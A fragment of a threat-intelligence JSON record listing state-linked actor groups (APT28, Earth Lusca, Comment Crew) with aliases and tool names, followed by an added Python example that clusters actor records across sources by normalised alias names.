			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28",
				"ATK5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"GRAPHITE",
				"Group 74",
				"PawnStorm",
				"STRONTIUM",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"TA422",
				"TG-4127",
				"Tsar Team",
				"UAC-0001"
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b",
			"created_at": "2022-10-25T16:07:23.480196Z",
			"updated_at": "2026-04-10T02:00:04.626125Z",
			"deleted_at": null,
			"main_name": "Comment Crew",
			"aliases": [
				"APT 1",
				"BrownFox",
				"Byzantine Candor",
				"Byzantine Hades",
				"Comment Crew",
				"Comment Panda",
				"G0006",
				"GIF89a",
				"Group 3",
				"Operation Oceansalt",
				"Operation Seasalt",
				"Operation Siesta",
				"Shanghai Group",
				"TG-8223"
			],
			"source_name": "ETDA:Comment Crew",
			"tools": [
				"Auriga",
				"Cachedump",
				"Chymine",
				"CookieBag",
				"Darkmoon",
				"GDOCUPLOAD",
				"GLOOXMAIL",
				"GREENCAT",
				"Gen:Trojan.Heur.PT",
				"GetMail",
				"Hackfase",
				"Hacksfase",
				"Helauto",
				"Kurton",
				"LETSGO",
				"LIGHTBOLT",
				"LIGHTDART",
				"LOLBAS",
				"LOLBins",
				"LONGRUN",
				"Living off the Land",
				"Lslsass",
				"MAPIget",
				"ManItsMe",
				"Mimikatz",
				"MiniASP",
				"Oceansalt",
				"Pass-The-Hash Toolkit",
				"Poison Ivy",
				"ProcDump",
				"Riodrv",
				"SPIVY",
				"Seasalt",
				"ShadyRAT",
				"StarsyPound",
				"TROJAN.COOKIES",
				"TROJAN.FOXY",
				"TabMsgSQL",
				"Tarsip",
				"Trojan.GTALK",
				"WebC2",
				"WebC2-AdSpace",
				"WebC2-Ausov",
				"WebC2-Bolid",
				"WebC2-Cson",
				"WebC2-DIV",
				"WebC2-GreenCat",
				"WebC2-Head",
				"WebC2-Kt3",
				"WebC2-Qbp",
				"WebC2-Rave",
				"WebC2-Table",
				"WebC2-UGX",
				"WebC2-Yahoo",
				"Wordpress Bruteforcer",
				"bangat",
				"gsecdump",
				"pivy",
				"poisonivy",
				"pwdump",
				"zxdosml"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434530,
	"ts_updated_at": 1775826723,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/15830da9eb1ece90c6e53e04e43df3353bc18311.pdf",
		"text": "https://archive.orkl.eu/15830da9eb1ece90c6e53e04e43df3353bc18311.txt",
		"img": "https://archive.orkl.eu/15830da9eb1ece90c6e53e04e43df3353bc18311.jpg"
	}
}
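Added example, not part of the ORKL record or the Securonix advisory. The threat_actors array above carries the same actor several times under different source_name prefixes (MITRE, MISPGALAXY, Secureworks, ETDA), with the names spelled inconsistently (APT 37 / APT37, Group 123 / Group123, Tag-22 / TAG-22, trailing whitespace). The script below shows one way to resolve those records into actor clusters: normalise every main_name and alias, then union-find records that share a normalised name. Tools are deliberately not used as link evidence, because shared tooling such as Cobalt Strike appears under unrelated actors. RECORDS is a hand-built subset modelled on the entries above (tool lists trimmed, spelling variants kept in to exercise the normalisation); the normalisation rule and the clustering are this example's own choices, not ORKL's.

```python
"""Alias resolution across multi-source threat-actor records (added example)."""
import re
from collections import defaultdict

# Constructed subset modelled on the threat_actors entries on this page.
# Spelling variants and trailing whitespace are kept on purpose.
RECORDS = [
    {"source_name": "Secureworks:NICKEL JUNIPER", "main_name": "NICKEL JUNIPER",
     "aliases": ["Konni", "OSMIUM ", "Opal Sleet "], "tools": ["Konni"]},
    {"source_name": "MISPGALAXY:Opal Sleet", "main_name": "Opal Sleet",
     "aliases": ["Konni", "Vedalia", "OSMIUM"], "tools": []},
    {"source_name": "MITRE:APT37", "main_name": "APT37",
     "aliases": ["APT37", "InkySquid", "ScarCruft", "Group123",
                 "TEMP.Reaper", "Ricochet Chollima"],
     "tools": ["ROKRAT", "Cobalt Strike"]},
    {"source_name": "MISPGALAXY:APT37", "main_name": "APT37",
     "aliases": ["Red Eyes", "ScarCruft", "G0067", "Group 123", "APT 37",
                 "Ricochet Chollima", "InkySquid"], "tools": []},
    {"source_name": "MISPGALAXY:Earth Lusca", "main_name": "Earth Lusca",
     "aliases": ["CHROMIUM", "TAG-22", "BRONZE UNIVERSITY", "Charcoal Typhoon"],
     "tools": ["ShadowPad", "SprySOCKS"]},
    {"source_name": "Secureworks:BRONZE UNIVERSITY", "main_name": "BRONZE UNIVERSITY",
     "aliases": ["Earth Lusca ", "Earth Lusca", "Tag-22 ", "Charcoal Typhoon "],
     "tools": ["Cobalt Strike", "FunnySwitch"]},
]

_NON_ALNUM = re.compile(r"[^0-9a-z]+")


def normalize(name: str) -> str:
    """Case-fold and drop everything except letters and digits, so that
    'APT 37', 'APT37', 'Tag-22 ' and 'TAG-22' compare equal."""
    return _NON_ALNUM.sub("", name.casefold())


def name_set(record: dict) -> set:
    """All names a record claims for itself: main_name plus aliases.
    Tools are excluded on purpose: shared tooling is not actor identity."""
    raw = [record["main_name"], *record["aliases"]]
    return {normalize(n) for n in raw if normalize(n)}


def cluster_records(records) -> list:
    """Union-find over records: two records join one cluster when they
    share at least one normalised name. Returns sorted lists of
    source_name, the outer list sorted as well, for stable output."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]  # path halving
            i = parent[i]
        return i

    def union(a, b):
        ra, rb = find(a), find(b)
        if ra != rb:
            parent[rb] = ra

    owners = defaultdict(list)  # normalised name -> record indices
    for idx, rec in enumerate(records):
        for n in name_set(rec):
            owners[n].append(idx)
    for idxs in owners.values():
        for other in idxs[1:]:
            union(idxs[0], other)

    groups = defaultdict(list)
    for idx, rec in enumerate(records):
        groups[find(idx)].append(rec["source_name"])
    return sorted(sorted(g) for g in groups.values())


def same_actor(records, src_a: str, src_b: str) -> bool:
    """True when both source_name records land in the same alias cluster."""
    for group in cluster_records(records):
        if src_a in group:
            return src_b in group
    return False


def tool_only_links(records) -> dict:
    """Tools shared by records that alias resolution keeps apart, i.e. the
    merges a naive 'same tool, same actor' rule would wrongly create."""
    clusters = cluster_records(records)
    cluster_of = {s: i for i, g in enumerate(clusters) for s in g}
    by_tool = defaultdict(set)
    for rec in records:
        for t in rec["tools"]:
            by_tool[normalize(t)].add(rec["source_name"])
    return {t: sorted(srcs) for t, srcs in by_tool.items()
            if len({cluster_of[s] for s in srcs}) > 1}


if __name__ == "__main__":
    for group in cluster_records(RECORDS):
        print(" == ".join(group))
    print("Konni record shares a cluster with MITRE:APT37:",
          same_actor(RECORDS, "Secureworks:NICKEL JUNIPER", "MITRE:APT37"))
    print("tool-only links (ignored):", tool_only_links(RECORDS))
```

On this data the Konni-tagged records (Secureworks NICKEL JUNIPER, MISPGALAXY Opal Sleet / OSMIUM) form their own cluster and do not join either APT37 record; the only thing tying the APT37 entries to other clusters is the Cobalt Strike tool, which the clustering ignores. Stripping all non-alphanumerics is a deliberate trade-off: it merges Pawn Storm / PawnStorm correctly but would also merge any two names that differ only in punctuation, so review clusters that suddenly grow after a feed update.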